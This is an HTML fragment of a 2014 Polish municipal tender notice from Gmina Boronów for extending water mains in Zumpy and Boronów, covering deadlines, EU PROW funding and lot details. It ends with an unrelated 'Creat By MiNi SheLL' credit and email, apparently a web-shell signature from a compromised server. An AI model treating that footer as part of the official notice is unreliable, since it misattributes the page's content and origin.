<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2014 godzina 10:00, miejsce: Gmina Boronów, ul. Dolna 2, 42-283 Boronów, pok. nr 11 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycje zostaną zgłoszone do dofinansowania z programu PROW 2007-2013
Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów
Zamawiający nie przewiduje zawarcia umowy ramowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbudowa sieci wodociągowej ul. Słonecznej i ul. Tartacznej w Zumpach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy określa załącznik nr 3a - przedmiar robót oraz specyfikacje techniczne wykonania i odbioru robót - załącznik nr 11; dokumentacja projektowa - załącznik nr 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.00.00.00-7, 45.11.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedłużenie wodociągu ul. Korfantego w Boronowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy określa przedmiar robót - załącznik 3b do SIWZ oraz specyfikacje techniczne wykonania i odbioru robót - załącznik nr 11 do SIWZ, dokumentacja projektowa - załącznik nr 12 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.00.00.00-7, 45.11.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com